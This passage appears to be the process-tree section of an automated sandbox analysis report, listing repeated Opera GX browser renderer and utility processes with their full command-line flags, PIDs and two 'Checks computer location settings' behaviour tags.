C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=180 --field-trial-handle=10020,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3316 /prefetch:12⤵PID:5408
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=181 --field-trial-handle=9460,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9140 /prefetch:22⤵PID:7252
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=3388,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5388 /prefetch:82⤵PID:2880
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=183 --field-trial-handle=5268,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10452 /prefetch:12⤵PID:1688
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=184 --field-trial-handle=6692,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10320 /prefetch:22⤵PID:4004
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=185 --field-trial-handle=10488,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8836 /prefetch:12⤵PID:5060
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=5416,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7016 /prefetch:82⤵PID:5928
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=187 --field-trial-handle=7016,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9680 /prefetch:12⤵PID:5868
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=188 --field-trial-handle=7012,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=520 /prefetch:12⤵PID:4304
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=189 --field-trial-handle=3132,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6420 /prefetch:12⤵
- Checks computer location settings
PID:4112
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=190 --field-trial-handle=10700,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5288 /prefetch:12⤵PID:8120
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=191 --field-trial-handle=3000,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10516 /prefetch:12⤵PID:7192
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=192 --field-trial-handle=8368,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7928 /prefetch:12⤵PID:2968
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=193 --field-trial-handle=9608,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9340 /prefetch:12⤵PID:4476
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=194 --field-trial-handle=8784,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7056 /prefetch:12⤵PID:7712
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=195 --field-trial-handle=6084,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9960 /prefetch:12⤵
- Checks computer location settings
PID:312
-
-
